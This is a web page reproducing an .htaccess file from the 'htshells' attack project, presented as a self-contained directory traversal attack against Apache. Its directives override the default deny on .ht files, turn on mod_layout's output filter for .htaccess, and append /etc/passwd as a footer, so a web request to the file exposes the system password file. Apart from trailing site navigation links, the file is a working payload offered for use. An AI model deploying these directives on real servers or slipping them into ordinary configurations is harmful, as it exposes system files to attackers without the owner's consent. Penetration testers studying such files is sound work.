0xBADCA7/htshells/master/traversal/mod_layout.traversal.htaccess

# Self contained .htaccess directory traversal attack - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# This attack will dump /etc/password
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^.ht">
# Uncomment the line below for Apache2.4 and newer
# Require all granted
    Order allow,deny
    Allow from all
</Files>
# Enable mod_layout for .htaccess files
AddOutputFilter LAYOUT .htaccess

# Append the file we want below:
LayoutFooter /etc/passwd
##### BEGIN /etc/passwd ###########

On Github License

Files

Download PDF of Htaccess file

Comments

Apache

Htaccess Tutorial
Apache Directive Index
Directive Reference
twitter.com/htaccess